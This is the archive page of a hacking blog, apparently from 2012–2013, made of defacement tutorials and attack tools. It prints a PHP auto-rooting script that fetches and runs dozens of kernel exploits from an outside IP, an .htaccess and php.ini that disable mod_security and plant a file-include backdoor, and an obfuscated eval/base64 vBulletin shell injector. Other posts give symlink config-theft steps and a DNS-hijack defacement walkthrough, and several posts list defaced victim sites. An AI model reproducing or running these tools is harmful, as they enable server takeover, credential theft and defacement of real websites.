Showing posts with label HACKED. Show all posts
Showing posts with label HACKED. Show all posts

Tuesday, March 19, 2013

|| DNS SPOOFING ||


Here is a beautiful Tut From my dear friend H4x4rwOw on DNS SPOOFING


Recommended to download and watch
Download Here
Note:- Only for Educational purpose
Read More...

Tuesday, March 12, 2013

|| SHELL UPLOAD+BACK CONNECT+ROOTING+MASSDEFACE ||


HERE WE GO FINALLY MY MASTER TUT ON SHELL UPLOAD+BACK CONNECT+ROOTING+ MASS DEFACE ALL IN ONE VIDEO.. :)

THIS TUT IS DEDICATED TO ALL MY FRIENDS WHO HAVE HELPED ME TO REACH WHAT I AM TODAY IN THIS FIELD AND TO ALL WHO KEEP FOLLOWING AND VISITING MY WEBSITE...
FROM A LONG TIME WANTED TO MAKE THIS KINDA TUT FOR MY BEGINNER FRIENDS WHO STRUGGLE IN ALL THIS..
HOPE THIS WILL HELP YOU IN LEARNING
RECOMMENDED TO DOWNLOAD AND WATCH
Download
NOTE:- ONLY FOR EDUCATIONAL PURPOSE
Read More...

Thursday, February 28, 2013

|| 2013 Auto R00t3r ||


Auto root 2013 Developped by Mauritania Attacker
www.mauritania-sec.com
https://www.facebook.com/mauritanie.forever
Usage:-
chmod 777 the script for example r00t.php
and then launch  ./r00t.php
#!/usr/bin/php 
<?php 
/* 
# Auto root 2013 Developped by Mauritania Attacker
# www.mauritania-sec.com
# https://www.facebook.com/mauritanie.forever
# <3 AnonGhost <3 
*/ 
set_time_limit(0); 
system("clear"); 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n"; 
print "|PHP Auto Root by Mauritania Attacker               |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n"; 
print "|Contact: fb.com/mauritanie.forever                 |\n"; 
print "|Priv8 Version                                      |\n"; 
print "|Rooting: Linux and FreeBSD                         |\n"; 
print "|<3 AnonGhost <3                                    |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n"; 
sleep(4); 
print "\nKernel to verify:\n"; 
print "lnx or bsd: "; 
$kernel = fgets(STDIN); 
$kernel = trim($kernel); 
if($kernel == "lnx") 

print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n"; 
print "|PHP Auto Root by Mauritania Attacker             |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n"; 
print "|Selected kernel : |Linux arq|                    |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n"; 
sleep(2); 
print "\n[+] Testing lnx xpl's please wait.\n"; 
print "[~] Meanwhile smoke a cigaret XD (:\n"; 
sleep(2); 
system("mkdir lnx;cd lnx/"); 

system("wget http://184.22.219.50/xpl/2.6.3all"); 
system("chmod 777 2.6.3all"); 
system("./2.6.3all"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.17"); 
system("chmod 777 2.6.17"); 
system("./2.6.17"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.18"); 
system("chmod 777 2.6.18"); 
system("./2.6.18"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.18-6"); 
system("chmod 777 2.6.18-6"); 
system("./2.6.18-6"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.18-20"); 
system("chmod 777 2.6.18-20"); 
system("./2.6.18-20"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.32"); 
system("chmod 777 2.6.32"); 
system("./2.6.32"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.32_i686"); 
system("chmod 777 2.6.32_i686"); 
system("./2.6.32_i686"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.32nine"); 
system("chmod 777 2.6.32nine"); 
system("./2.6.32nine"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.33"); 
system("chmod 777 2.6.33"); 
system("./2.6.33"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.34"); 
system("chmod 777 2.6.34"); 
system("./2.6.34"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.34-2011"); 
system("chmod 777 2.6.34-2011"); 
system("./2.6.34-2011"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.37"); 
system("chmod 777 2.6.37"); 
system("./2.6.37"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.37rc2"); 
system("chmod 777 2.6.37rc2"); 
system("./2.6.37rc2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.37-rc2"); 
system("chmod 777 2.6.37-rc2"); 
system("./2.6.37-rc2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.39-2011"); 
system("chmod 777 2.6.39-2011"); 
system("./2.6.39-2011"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.39-2011-2012"); 
system("chmod 777 2.6.39-2011-2012"); 
system("./2.6.39-2011-2012"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.x"); 
system("chmod 777 2.6.x"); 
system("./2.6.x"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/15"); 
system("chmod 777 15"); 
system("./15"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2010-1"); 
system("chmod 777 2010-1"); 
system("./2010-1"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/ab"); 
system("chmod 777 ab"); 
system("./ab"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/c"); 
system("chmod 777 c"); 
system("./c"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/el5i386"); 
system("chmod 777 el5i386"); 
system("./el5i386"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/el5x86"); 
system("chmod 777 el5x86"); 
system("./el5x86"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/elflbl"); 
system("chmod 777 elflbl"); 
system("./elflbl"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exp1"); 
system("chmod 777 exp1"); 
system("./exp1"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exp2"); 
system("chmod 777 exp2"); 
system("./exp2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exp3"); 
system("chmod 777 exp3"); 
system("./exp3"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exploit"); 
system("chmod 777 exploit"); 
system("./exploit"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exploit2"); 
system("chmod 777 exploit2"); 
system("./exploit2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/froot"); 
system("chmod 777 froot"); 
system("./froot"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/glibc"); 
system("chmod 777 glibc"); 
system("./glibc"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/iskorpitx"); 
system("chmod 777 iskorpitx"); 
system("./iskorpitx"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/jessica2"); 
system("chmod 777 jessica2"); 
system("./jessica2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/pkexec"); 
system("chmod 777 pkexec"); 
system("./pkexec"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/rds-exploit"); 
system("chmod 777 rds-exploit"); 
system("./rds-exploit"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/vmsplice"); 
system("chmod 777 vmsplice"); 
system("./vmsplice"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/xplSUPER"); 
system("chmod 777 xplSUPER"); 
system("./xplSUPER"); 
sleep(1); 
print("[+] all lnx xpl's testeds! exiting!\n"); 
system("id"); 
exit(0); 

elseif($kernel == "bsd") 

print "|--=--=--=--=--=--=--=--=--=--=--=--=--=--------|\n"; 
print "|PHP Auto Root by Mauritania Attacker           |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=--------|\n"; 
print "|Selected kernel : |BSD-arq|                    |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=--------|\n"; 
sleep(2); 
print "\n[+] Testing bsd xpl's please wait.\n"; 
print "[~] Meanwhile smoke a cigaret XD (:\n"; 
sleep(2); 
system("mkdir BSD;cd bsd/"); 

system("wget http://184.22.219.50/xpl/FreeBSD/6.1-09.c"); 
system("gcc -o 6.1-09 6.1-09.c -lpthread"); 
system("chmod 777 6.1-09"); 
system("./6.1-09"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/6.4"); 
system("chmod 777 6.4"); 
system("./6.4"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/7.1-08.c"); 
system("gcc -o 7.1-08 7.1-08.c "); 
system("chmod 777 7.1-08"); 
system("./7.1-08"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/2010"); 
system("chmod 777 2010"); 
system("./2010"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/a.out"); 
system("chmod 777 a.out"); 
system("./a.out"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/cebkmount"); 
system("chmod 777 cebkmount"); 
system("./cebkmount"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/cve-2010-2693"); 
system("chmod 777 cve-2010-2693"); 
system("./cve-2010-2693"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/6.1-09.c"); 
system("gcc -o 6.1-09 6.1-09.c -lpthread"); 
system("chmod 777 6.1-09"); 
system("./6.1-09"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/free7.sh"); 
system("chmod 777 free7.sh"); 
system("./free7.sh"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/l"); 
system("chmod 777 l"); 
system("./l"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/master"); 
system("chmod 777 master"); 
system("./master"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/w00t.so.1.0"); 
system("chmod 777 w00t.so.1.0"); 
system("./w00t.so.1.0"); 
exit(0); 


//EOF_ 
//2013 
//Priv8 Version  

?>

Read More...

Thursday, November 29, 2012

|| 403 Forbidden and cant read /etc/named.conf Error Bypass ||


This Tut has been submitted by Sen Haxor :D

Now days most of the 2012 Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .


Posted Image

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this .


I will be posting the download link of some shells i will be using in this tutorial


Best Script which can bypass cant read /ect/named.conf are
:

1. Config Fucker By Web Root Hack Tools.
( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )

3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )

4. Symlink_Sa 3.0 Automated Symlink Script .


Usage : Config Fucker , Con
fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there :D

Note : Its better to create a php.ini file before you do this for 100 % Result ^_^


All 4 shells i have mentioned i will post the download link :D


And i will be using a another private shell for this which i wont be giving you all
for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell .

So now if we cant to symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -


Posted Image

So now that we can easily Symlink to /Public_html/ path of each website :rolleyes:


Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit ;)




For 403 Forbidden Error i will be Using the Following Shells :


1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )

2. Mannu Shell by Team Indishell Private ! .

3. Symlink_sa 3.0 Script


I will be posting the download link of Dhanush shell and Symlink
_sa 3.0 ( Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden
, Its just the .htaccess and php.ini which contains the following code :

.htaccess


<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>


php.ini


<?

echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>


1.) 403 Forbidden Error :


Posted Image
2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .

Posted Image

3.) Mannu shell to Check if we Bypassed 403 Error
:

Posted Image


4.) Bypassed 403 Forbidden and Access to Public_html/ Path


Posted Image
Bypassed can't read /ect/named.conf and 403 forbidden Error :wub:

Here Download Link of all shell and script i used
:  

http://zyan.me/Lcyil  

Greetz : CyberAce Legion Who made me make this Tut and Team Indishell and all Indian Hackers .
Thanks :D


Regards Sen Haxor B)
Read More...

Sunday, November 25, 2012

How google.com.pk was hacked??


HII GUYS YOU SAW MANY HACK TODAY WITH GOOGLE.COM.PK AND MANY OTHERS AND SUBDOAMIN CREATED
LETS SEE HOW IT WAS DONE
1. GO TO http://whois.domaintools.com/
2. ENTER google.com.pk

YOU WILL SEE THIS
SEE THE NAME SERVER HAS BEEN CHNAGED TO
dns1.freehostia.com
dns2.freehostia.com

3.GO TO FREEHOSTIA.COM AND SIGN UP
   WHILE SIGNING UP PUT BELOW DETAILS

IN USE MY EXISITING DOMAIN PUT domain name you want.google.com.pk
AND REGISTER.

AFTER THAT YOU WILL RECEIVE AND EMAIL LOGIN WITH THE DETAILS RECIEVED ONCE YOU LOGIN YOU WILL SEE THIS SCREEN

THEN CLICK ON MY DOMAINS AND THEN DNS RECORDS AND CLICK ON THE DOMAIN YOU CREATED

CHANGE SECOND LINE TYPE =MX VALUE TO
dns1.freehostia.com
or
dns2.freehostia.com
AND CLICK ON MODIFY
AND THEN GO TO FILES--> FILE MANAGER
YOU WILL SEE A FOLDER WITH YOUR DOMAIN NAME.. OPEN IT
AND UPLOAD YOUR DEFACE PAGE YOUR DONE!!!!

http://www.picasaweb.google.pk/
http://jaguarhacker.google.com.pk/

http://www.zone-h.org/mirror/id/18642644
http://www.zone-h.org/mirror/id/18642652
Read More...

Saturday, November 24, 2012

|| Decode Php lockit encoded script ||


HELLO FRIENDS TODAY IM SHARING A VIDEO TUT ON DECODING PHP LOCKIT SOFT ENCODED SCRIPT
IM SHOWING YOU E MANUAL WAY TO DO IT..
THINGS YOU REQUIRED TO DO IT
1. XAMPP
   http://www.apachefriends.org/en/xampp.html
2. NOTEPAD ++
    http://notepad-plus-plus.org/download/v6.2.2.html
3. HOW TO INSTALL XAMPP
    https://www.dropbox.com/s/m79dmvcmwwh0mwo/INSTALL%20XAMPP.ppt

HERE IS THE VIDEO TUT
NOTE:- WATCH IN FULL SCREEN FOR BETTER UNDERSTANDING

Read More...

Thursday, October 25, 2012

|| CRLF Injection by Un_N0n Antil0g ||



Biography of Author
Gurender Singh A.K.A Un_N0n Antil0g is Learner and Independent IT security researcher , currently working with Team Indi HeX And ICP Helping new people in field of hacking and security. He is Admin of Team Indi HeX. And Admin of Indian Cyber Police with Nipun jaswal , Chetan Soni , COde InjectOr.



BRIEF INTRODUCTION
CRLF Injection Vulnerability is a web application vulnerability happens due to direct passing of user entered data to the response header fields like (Location, Set-Cookie and ETC) without proper sanitations, which can result in various forms of security exploits. Security exploits range from XSS, Cache-Poisoning, Cache-based defacement, page injection and ETC.


Download the paper from Here
Read More...

Wednesday, August 15, 2012

|| HACKED BY H4x4rwOw ||



Sites Hacked by H4x4rwOw hacker Team member of MCA

http://www.znps.org.pk
http://www.divinesmiles4u.com
http://www.sajidabbasi.com
http://www.sabsol.com
http://www.onlineearningway.com
http://mmm.org.pk
http://www.siliken.com.pk
http://www.transpilottrading.com
http://www.shaikhusharif.com
http://www.samadsonsjewellers.com
http://www.sadiqmedicare.com
http://www.hiresoftwareqa.com
http://www.goodnewstv.pk
http://www.globaltouchorg.com
http://www.gcopower.com
http://www.funizm.com
http://www.fashiontill.com
http://www.expressionzz.com
http://www.agriscouts.org
http://www.countygeneralcontractor.com
http://www.asadandasad.com
http://www.allahwaliderrapindibipas.com
http://www.ahsantime.com
http://www.centuary21lawco.net
http://swisslace.com.pk
http://www.niftye.com
http://www.minalsystems.com
http://technwar.com
http://gogo1122.com
http://www.ibrarcentre.pk
http://paperpk.org
http://ourhomeinteriors.com
http://www.techparrallex.com/404.php

MIRRORS:-
http://pastebin.com/kZpDi135
Read More...

Sunday, June 10, 2012

|| SHELL UPLOADING VIA TAMPER DATA ||


HELLO GUYS I HAVE ALREADY POSTED TUTS ON MANUAL SQL INJECTION AND SQL INJECTION VIA TOOL LIKE SQLMAP...
BUT TODAY ILL SHOW YOU HOW TO UPLOAD SHELL ONCE YOU HAVE THE ADMIN ACCESS :)
HERE IS THE VIDEO TUT
HOPE YOU GUYS FIND IT USEFUL
DOWNLOAD TAMPER DATA ADDON (GOOGLE IT)
http://zyan.me/hhrkC 
Read More...

Saturday, May 5, 2012

|| vBulletin shell Injector Bypass ||


 This technique is used when reading the config.php
/ admincp / protect be
inserted into the shell: faq.php, memberlist.php, search.php, calendar.php, showgroups.php
 http://victim.com/faq. php


Script Code:- vb.php


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>~ vBulletin ShELL InjEctOr ~</title>
<style type="text/css">
<style type="text/css">   
<?
 /*
#############################
    Coded By IraQiaN-r0x
      myr1z@yahoo.com
############################
*/
?>
body {
scrollbar-face-color:#0e0e0e;
scrollbar-highlight-color:#0e0e0e;
scrollbar-3dlight-color:#1a1a1a;
scrollbar-darkshadow-color:#0e0e0e;
scrollbar-shadow-color:#1a1a1a;
scrollbar-arrow-color:#990033;
scrollbar-track-color:#000000;
}
*{margin: 0; padding: 0;}
body{text-align: center;
font: 11px Tahoma;
color: #333333;
background: #EEEEEE url(http://img401.imageshack.us/img401/9725/511z.gif);
}
a{color:#970000;
text-decoration: none;
}
a:hover {text-decoration: none;
color: #470000;
}
.box {background-color: #000;
border: 4px solid #090909;
padding: 5px;
margin-bottom: 10px;
width : 40%;
}

.box h3 {background-color: #470000;
color: #a7a7a7;
font-size: 11px;
padding: 7px;
margin-bottom: 5px;
}
#comments form p {margin-bottom: 5px;}
#comments form input {margin-right: 5px;}
#comments form input, textarea {border: 1px solid #cccccc;
font-size: 11px;
font-family: tahoma;
padding: 4px;
background-position: 4px 4px;
background-repeat: no-repeat;
}
#comments form input {border: 1px solid #cccccc;
}
#comments form textarea {padding: 4px 4px !important;
border: 1px solid #cccccc;
}
#comments form button {border: 1px solid #a0a0a0;
font-size: 1em;
font-family: Verdana;
padding: 2px 6px;
}
</style>
</head>
<body>
<br />
<br />
<br />
<div align="center">
<div class="box">
<h3>:: Shell injEcTiOn By SQL QuEry ::</h3>
<?php
$r0x = "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";
/*======================================================================*\
|| #################################################################### ||
|| #                  ~ vBulletin ShELL InjEctOr ~                      # ||
|| #                      CodEd By IraQiaN-r0x                          # ||
|| #                          myr1z@yahoo.com                              # ||
|| #################################################################### ||
\*======================================================================*/
eval(gzinflate(base64_decode("$r0x")));
?>
Save it as vb.php
Read More...

Saturday, April 28, 2012

|| MANUAL MASS DEFACE VIDEO TUT ||



HELLO GUYS THIS IS AV
MANY OF YOU KNOW HOW TO MASS DEFACE AFTER ROOTING SERVER
BUT GUYS TODAY I'LL SHOW YOU HOW TO MASS DEFACE IT MANUALLY
WITHOUT ANY MASS DEFACING SCRIPT :))

DOWNLOAD THE VIDEO TUT FROM HERE
http://zyan.me/kgWtr 

NOTE:- ONLY FOR EDUCATIONAL PURPOSE
Read More...

Friday, April 27, 2012

|| ByPass Symlink On Lite Speed Server ||


Read More...

Sunday, April 15, 2012

|| SYMLINK + WHMCS HACKING ||


Hello Guys. Today Ill show you how to bypass symlink on a Web hosting of secured server and get access to its database.
And how to manually crack Web hosting and get whmcs access once you have database :)



Or download it from Here Updated link!!!
https://www.dropbox.com/s/vji3xjeskiyzsqy/Symlink%20and%20WHMCS%20Hacking%20by%20AV.mp4
NOTE;- Only for educational purpose ;)
Read More...

|| 293 hacked by Cyb3R_Shubh4M ||



4q-s-nettech.com
aaenvironmental.ca
accurassay.com
acow.ca
aelabs.ca
agritraction.com
aircrafthangars.ca
airleakagesolutions.ca
airtugger.com
alittlefurthernorth.com
alpinelawncare.ca
altuscanada.com
alzheimer.oxford.on.ca
atmail.nettrac.net
atthecore.ca
auburnhillco.com
bandlcontracting.com
barriersciences.com
bellcityjerseys.com
bestwesterntorontoairport.com
bglgroup.com
bigwheel.ca
bluecircle.com
bodybalanceperformance.com
bodyworksfitness.ca
brentbalmer.ca
briandomm.com
brodaseating.com
buildingblockideas.com
c21progroup.ca
camboia.ca
cambridgerowingclub.on.ca
cambridgespeedskating.ca
campbel.ca
canadahotairballoonrides.ca
cavendishmanor.com
century21heritagehouse.com
chelseypark.com
cibwoodstock.com
clbphils.org
coach.opid.ca
coffee-enema.ca
comedancing.ca
communitylivingtillsonburg.ca
complete-safety-resources.ca
coronadocorp.com
corporatetouch.ca
countryhavenretirementhome.com
countrykettle.com
cporlandodwtn.com
cruisingcanada.com
deerparklodge.com
dejong.com
demosite.ca
descramble.timmer.ca
dibc.on.ca
dilcmail.com
downtowncrowne.com
dragonboatwoodstock.ca
easy-web.ca
edc.easy-web.ca
emeraldhospitality.ca
emeraldhospitalitygroup.com
epiksound.com
fieldofdaisies.on.ca
findcarl.timmer.ca
flightrez.com
flightstofortmcmurray.com
flightstolasvegas.ca
flightstoorlando.ca
flightstothunderbay.com
flightstotoronto.ca
fluidpowerhouse.com
flyprivateskies.com
fms.ca
followingfido.ca
followingfido.com
fotocan.org
fourpointsstcatharines.com
fourpointstoronto.ca
fourpointstoronto.com
framedmemories.ca
futon-fashions.ca
glassfordchrysler.com
glenile.com
gngroup.ca
gni.ca
gni.on.ca
goldenoakhomes.ca
golfjets.com
golflimos.com
gozzard.com
gozzardcomposites.com
gsdunn.com
gunnersgolf.com
hanleys.easy-web.ca
harmonymassage.ca
harvan.com
hawboldt.ca
hawboldt.nl.ca
hcconsult.com
hidowntownwindsor.ca
hidowntownwindsor.com
hiranifamily.com
holidayinnbinghamton.com
holidayinnvestal.com
hurleybuilds.ca
independentmusicmall.com
info.easy-web.ca
ingersollgolf.com
jamiesonhilts.com
justame.com
kaylaw.ca
kenmcgeeautobooks.com
keybasecambridge.ca
knobsandpullsdepot.com
knoxstthomas.ca
kwbroker.ca
kwintercitydartleague.ca
kwwaterpolo.com
laserworks-canada.com
lloydselectric.ca
lombardmanor.com
macdonaldindustrialsales.com
mamurphyart.com
mar-inc.com
maximumpotentialsports.com
mcclays.ca
mgmglass.com
middleclassmillionaire.ca
mikeselectricltd.ca
militarypowerhouse.com
millsandassociates.com
mobilife.on.ca
monastesse.com
mwdatcon.com
nettrac.net
northwoodsdoors.com
novoteltorontoairport.com
ogihockey.com
oneproudplanet.ca
oneproudplanet.com
opid.ca
originalthought.com
osog.ca
oxfordselfstorage.ca
parkviewcustoms.com
parkviewcustomsbrokerage.com
pcoptions.nettrac.net
pcoptions.on.ca
planningprocessstrategic.com
pmcanada.ca
pneumaticwinch.com
postmaster.aaenvironmental.ca
postmaster.acow.ca
postmaster.aelabs.ca
postmaster.atthecore.ca
postmaster.bglgroup.com
postmaster.bluecircle.com
postmaster.brodaseating.com
postmaster.chelseypark.com
postmaster.dejong.com
postmaster.easy-web.ca
postmaster.fms.ca
postmaster.goldenoakhomes.ca
postmaster.harvan.com
postmaster.hcconsult.com
postmaster.hidowntownwindsor.com
postmaster.holidayinnbinghamton.com
postmaster.knoxstthomas.ca
postmaster.kwintercitydartleague.ca
postmaster.lloydselectric.ca
postmaster.mcclays.ca
postmaster.middleclassmillionaire.ca
postmaster.mobilife.on.ca
postmaster.originalthought.com
postmaster.oxfordselfstorage.ca
postmaster.pmcanada.ca
postmaster.powlab.com
postmaster.proveal.com
postmaster.qsandp.ca
postmaster.reiners.ca
postmaster.reliablenetworks.ca
postmaster.roylco.com
postmaster.simalconsulting.ca
postmaster.sunlighthomes.ca
postmaster.vanceconstruction.ca
postmaster.wc2.ca
postmaster.wlac.ca
postmaster.zarkys.ca
postmaster.zehrgroup.ca
powlab.com
powlaboratories.com
projecthitech.ca
promopitstop.ca
proveal.com
ptacs.com
qcssystems.com
qsandp.ca
quietcrescentart.com
quikasair.com
rainbowcentresudbury.com
ramadawindsor.com
ramautor.com
reduceyoursmoking.com
regionalmillwright.com
reichracing.com
reiners.ca
reliablenetworks.ca
robinkramergardendesign.com
royallepagewoodstock.com
roylco.ca
roylco.com
sam.nettrac.net
